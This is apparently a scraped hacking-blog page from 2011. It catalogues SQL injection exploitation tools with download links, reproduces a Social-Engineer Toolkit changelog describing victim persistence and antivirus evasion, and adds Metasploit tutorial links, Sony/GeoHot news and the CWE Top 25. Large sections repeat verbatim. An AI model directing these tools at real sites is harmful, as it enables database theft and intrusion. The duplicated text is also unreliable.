http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
aidsql - Linux
Is a PHP application provided for detecting security holes in your website/s. It's a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation.
Download
http://code.google.c.../downloads/list
The Mole
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Tutorial
http://themole.sourceforge.net/?q=tutorial
Download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-win32.zip/download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-lin-src.tar.gz/download
NTO SQL Invader
NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records,tables and user accounts of the back-end database.
Download
http://go.ntobjectives.com/
FatCat Auto SQLl Injector
This is an automatic SQL Injection tool called as FatCat , Use of FatCat for testing your web application and exploit your application more deeper. FatCat Features that help you to extract the Database information, Table information, and Column information from web application. Only If it is vulnerable to SQL Injection Vulnerability.
Requirement:
PHP Verison 5.3.0
Enable file_get_function
Video
http://dl.dropbox.com/u/18007092/FatCat.swf
Download
http://code.google.com/p/fatcat-sql-injector/downloads/list
SQLol v.....
SQLol is a configurable SQL injection testbed. SQLol allows
you to exploit SQL injection flaws, but furthermore allows
a large amount of control over the manifestation of the flaw.
Options:
Type of query
Location within query
Type and level of sanitization
Level of query output
Verbosity of error messages
Visibility of query
Injection string entry point
Other cool things:
Reset button
Challenges
Support for multiple database systems
Download
https://github.com/SpiderLabs/SQLol/downloads
Enema
Enema is not autohacking software. This is dynamic tool for people, who knows what to do.Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
Features:
Multi-platform.
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Plugins to automate attacks
Supported for today:
POST, GET, Cookies
MSSQL >=2000 and MySQL>=5.0
Injection methods supported:
Error based injection.
Union based injection (using subquery).
Blind Time-based MSSQL(waitfor), MySQL(sleep)
Download
http://code.google.com/p/enema/downloads/list
SQLI Hunter: SQL Injection Hunter
“SQLI Hunter” SQL Injection Hunter 1.0 dari namanya sudah jelas bahwa aplikasi ini berfungsi untuk mencari website yang rentan terhadap serangan SQL Injection. Dilengkapi 4493 Dorks, dan dalam sekali scan mendapatkan 96 hasil. Dilengkapi juga Pencari Login Page Admin.
Dowload
http://adf.ly/313683/http://www.mediafire.com/download.php?pvvp3jx23fps750
Portable
http://adf.ly/313683/http://www.mediafire.com/?qe646an7woqbcmo
sqlifuzzer
sqlifuzzer is a command line scanner that seeks to identify SQL injection vulnerabilities. It parses Burp logs to create a list of fuzzable requests... then fuzzes them.
Download
http://code.google.com/p/sqlifuzzer/downloads/list
sqlcake
Automatic dump database & interactive sql shell tool dumps the current database structure including tables and columns and turns into an interactive mysql prompt with extra features
- sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
- sqlcake offers a few useful functions to gather database information easily by sql injection usage.
- sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.
- sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.
Download
http://sourceforge.net/projects/sqlcake/files/
Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.
Download
http://code.google.com/p/webraider/downloads/list
Download PDF
http://www.mavitunasecurity.com/s/research/OneClickOwnage.pdf
Havij Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users…..
e.g.
Havij v1.14
http://www.itsecteam.com/files/havij/Havij1.14Free.rar
Downlaod Help (pdf format)
http://www.itsecteam.com/files/havij/havij_help-english.pdf
Downlaod Help (chm format)
http://www.itsecteam.com/files/havij/havij_help-english.chm
Pangolin free edition released
Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool
for Website manager or IT Security analyst. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once it detects
one or more SQL injections on the target host, the user can choose among a
variety of options to perform an extensive back-end database management system
fingerprint, retrieve DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or users specific DBMS
tables/columns, run his own SQL statement, read specific files on the file
system and more.
Test many types of databases
Your web applications using Access,DB2,Informix,Microsoft SQL Server
2000,Microsoft SQL Server 2005,Microsoft SQL Server
2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase?
Pangolin supports all of them.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall
setting, Injection Digger, Data dumper, etc.
Download:
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip
SQLIer
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.
An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack.
Download:
http://bcable.net/releases.php?sqlier
SQID
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities.
Download:
http://sqid.rubyforge.org/#download
FJ-Injector Framwork
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation
Download:
http://sourceforge.net/projects/injection-fwk/files/
Safe3 Sql Injector
Features:
Full support for http, https website.
Full support for Basic, Digest, NTLM http authentications.
Full support for GET, Post, Cookie sql injection.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
Powerful AI engine to automatic recognite injection type, database type, sql injection best way.
Support to enumerate databases, tables, columns and data.
Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
Support to ip domain query,web path guess,md5 crack etc.
Support for sql injection scan.
Download:
http://sourceforge.net/projects/safe3si/files/Safe3SI-8.1.rar/download
Sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
Sqlmap
is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.
Download
http://sqlmap.sourceforge.net/#download
Download Gui-for-sqlmap
http://code.google.com/p/gui-for-sqlmap/downloads/list
SQL Power Injector
is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.
Download
http://www.sqlpowerinjector.com/download.htm
Absinthe
is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.
Download
http://www.0x90.org/releases/absinthe/download.php
bsqlbf-v2:
This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
Download
http://code.google.com/p/bsqlbf-v2/downloads/list
Marathon Tool
Marathon Tool is a POC for using heavy queries to perform a Time-Based Blind SQL Injection attack. This tool is still work in progress but is right now in a very good alpha version to extract information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases.
Download
http://marathontool.codeplex.com/#
pysqlin
Pysqlin is a console python tool to exploit SQL Injection vulnerabilities. It has 3 main adaptable components via a plugin framework:
Plugin: Adds functionality to the main program.
Injector: Provides injection methods.
Filter: Allows to modify the final http request and DDBB query in order to perform any kind of transformation.
Implemented: Oracle, MySQL and Microsoft SQL Server.
Download
http://code.google.com/p/pysqlin/source/checkout
BSQL Hacker
BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.
Download
http://labs.portcullis.co.uk/application/bsql-hacker/
sqlus
sqlsus is an open source MySQL injection and takeover tool, written in perl.
Supports only MySQL.
Download
http://sqlsus.sourceforge.net/download.html
DarkMySQLi16.py
SQL Injection tool's by rsauron written in Python
Download
http://www.multiupload.com/NV6T2XOI1A
Source
darkc0de Crew
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL. The Old SQL Tool will no longer be supported.
Download
http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
mySQLenum
is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Supports only MySQL
Download
http://sourceforge.net/projects/mysqlenum/files/mysqlenum-0.3.tar.gz/download?_test=goal
PRIAMOS
is a powerful SQL Injector & Scanner
You can search SQL Injection vulnerabilities and inject vulnerable string to get all
Databases, Tables and Column datas with injector module.
Supports only Microsoft SQL Server.
Download
http://www.priamos-project.com/versions.htm
SFX-SQLi
Supports only Microsoft SQL Server.
Download
http://www.kachakil.com/default.htm
yInjector
yInjector is a MySQL Injection penetration tool
Supports only MySQL.
Download
http://y-osirys.com/softwares/s-softwares/id10#subsec=s-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool
Bobcat
is a tool to aid a security consultant in taking full advantage of SQL injection vulnerabilities. It was originally created to build and extend upon the capabilities of a tool named "Data Thief".
Download
http://www.northern-monkee.co.uk/pub/bobcat.html
ExploitMyUnion
is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.
Download
http://sourceforge.net/projects/exploitmyunion/files/v2.x/exploitmyunion-2.1_win32.zip/download?_test=goal
Laudanum
is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.
Download
http://sourceforge.net/projects/laudanum/files/laudanum-0.2/laudanum-0.2.tar.gz/download?_test=goal
Hexjector
is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.
Download
http://sourceforge.net/projects/hexjector/files/Hexjector%20%28Win32%29/Hexjector%20v1.0.7.4.zip/download?_test=goal
Toolza
UTF-8 perlsсriрt
SQL injection DB supported: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird/Interbase
include Blind Mysql injection + alternative methods
Download
http://pastebin.com/QJ1MMiux
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL.
Download
http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
aidsql - Linux
Is a PHP application provided for detecting security holes in your website/s. It's a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation.
Download
http://code.google.c.../downloads/list
The Mole
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Tutorial
http://themole.sourceforge.net/?q=tutorial
Download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-win32.zip/download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-lin-src.tar.gz/download
NTO SQL Invader
NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records,tables and user accounts of the back-end database.
Download
http://go.ntobjectives.com/
FatCat Auto SQLl Injector
This is an automatic SQL Injection tool called as FatCat , Use of FatCat for testing your web application and exploit your application more deeper. FatCat Features that help you to extract the Database information, Table information, and Column information from web application. Only If it is vulnerable to SQL Injection Vulnerability.
Requirement:
PHP Verison 5.3.0
Enable file_get_function
Video
http://dl.dropbox.com/u/18007092/FatCat.swf
Download
http://code.google.com/p/fatcat-sql-injector/downloads/list
SQLol v.....
SQLol is a configurable SQL injection testbed. SQLol allows
you to exploit SQL injection flaws, but furthermore allows
a large amount of control over the manifestation of the flaw.
Options:
Type of query
Location within query
Type and level of sanitization
Level of query output
Verbosity of error messages
Visibility of query
Injection string entry point
Other cool things:
Reset button
Challenges
Support for multiple database systems
Download
https://github.com/SpiderLabs/SQLol/downloads
Enema
Enema is not autohacking software. This is dynamic tool for people, who knows what to do.Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
Features:
Multi-platform.
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Plugins to automate attacks
Supported for today:
POST, GET, Cookies
MSSQL >=2000 and MySQL>=5.0
Injection methods supported:
Error based injection.
Union based injection (using subquery).
Blind Time-based MSSQL(waitfor), MySQL(sleep)
Download
http://code.google.com/p/enema/downloads/list
SQLI Hunter: SQL Injection Hunter
“SQLI Hunter” SQL Injection Hunter 1.0 dari namanya sudah jelas bahwa aplikasi ini berfungsi untuk mencari website yang rentan terhadap serangan SQL Injection. Dilengkapi 4493 Dorks, dan dalam sekali scan mendapatkan 96 hasil. Dilengkapi juga Pencari Login Page Admin.
Dowload
http://adf.ly/313683/http://www.mediafire.com/download.php?pvvp3jx23fps750
Portable
http://adf.ly/313683/http://www.mediafire.com/?qe646an7woqbcmo
sqlifuzzer
sqlifuzzer is a command line scanner that seeks to identify SQL injection vulnerabilities. It parses Burp logs to create a list of fuzzable requests... then fuzzes them.
Download
http://code.google.com/p/sqlifuzzer/downloads/list
sqlcake
Automatic dump database & interactive sql shell tool dumps the current database structure including tables and columns and turns into an interactive mysql prompt with extra features
- sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
- sqlcake offers a few useful functions to gather database information easily by sql injection usage.
- sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.
- sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.
Download
http://sourceforge.net/projects/sqlcake/files/
Social-Engineer Toolkit v1.5 - Fast-Track Linux
Am Thursday, 30. Jun 2011 im Topic 'Tools'
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
Added shell to support Linux/OSX for SET Interactive Shell
Added download to support Linux/OSX for SET Interactive Shell
Added upload to support Linux/OSX for SET Interactive Shell
Added ps to support Linux/OSX for SET Interactive Shell
Added kill to support Linux/OSX for SET Interative Shell
Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
Added better integer handling when running listener.py by itself without specifying a port
Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
Added separate installers for shell.linux and shell.osx, to many differences between the two and needed different compiling.
Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
Added reboot now into the SET interactive Shell
Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
Added dynamic packing to download/upload for persistence, better AV avoidance
Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove whats in the screen, etc.
When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
Added back command to the SET interactive shell to go back when in different menus
Fixed a bug where it would state payloadprep not defined, it was caused to UPX not fully packing the device at time of upload, a 3 second delay has been added
To download the Social-Engineer Toolkit, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Or you can download the tarball here: Download here
http://www.secmaniac.com/files/set.tar.gz
To download Fast-Track, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/fasttrack fasttrack/
Official change log:
Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
Added shell to support Linux/OSX for SET Interactive Shell
Added download to support Linux/OSX for SET Interactive Shell
Added upload to support Linux/OSX for SET Interactive Shell
Added ps to support Linux/OSX for SET Interactive Shell
Added kill to support Linux/OSX for SET Interative Shell
Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
Added better integer handling when running listener.py by itself without specifying a port
Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
Added separate installers for shell.linux and shell.osx, to many differences between the two and needed different compiling.
Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
Added reboot now into the SET interactive Shell
Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
Added dynamic packing to download/upload for persistence, better AV avoidance
Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove whats in the screen, etc.
When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
Added back command to the SET interactive shell to go back when in different menus
Fixed a bug where it would state payloadprep not defined, it was caused to UPX not fully packing the device at time of upload, a 3 second delay has been added
To download the Social-Engineer Toolkit, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Or you can download the tarball here: Download here
http://www.secmaniac.com/files/set.tar.gz
To download Fast-Track, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/fasttrack fasttrack/
Metasploit Framework 3.7.2 incl. Tut
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
The Metasploit team has spent the last two months focused on one of the least-visible, but most important pieces of the Metasploit Framework; the session backend. Metasploit 3.7 represents a complete overhaul of how sessions are tracked within the framework and associated with the backend database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history -- even if you don't have a database.
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
Sony Hiring Information Security Engineers & Facebook Hire George Hotz
Am Thursday, 30. Jun 2011 im Topic 'News'
After 14 Hacks, Finally Sony open job recruitment for "Sr Application Security Analyst". Sony Estimates 171 Million Dollar Loss due to PSN Hack. Also Sony CEO sorry for PSN hack, offers data theft insurance.
Social network Facebook has hired a computer hacker who was recently sued by Sony for hacking the online game system PlayStation 3. Facebook did not reveal what 21-year-old George Hotz will do for the firm.
Hotz - also known by the alias "GeoHot" - gained notoriety in 2008 when he developed a software for unlocking the iPhone and allowing it to be used by other networks. He also released instructions on Sony PlayStation 3 that helped owners modify their consoles to run unauthorized applications and pirated games.
It's been two months since the personal details of 100 million PSN and SOE users were stolen and Sony is still dealing with the fall-out.
Social network Facebook has hired a computer hacker who was recently sued by Sony for hacking the online game system PlayStation 3. Facebook did not reveal what 21-year-old George Hotz will do for the firm.
Hotz - also known by the alias "GeoHot" - gained notoriety in 2008 when he developed a software for unlocking the iPhone and allowing it to be used by other networks. He also released instructions on Sony PlayStation 3 that helped owners modify their consoles to run unauthorized applications and pirated games.
It's been two months since the personal details of 100 million PSN and SOE users were stolen and Sony is still dealing with the fall-out.
Top 25 Most Dangerous Software Errors
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf
... ältere Einträge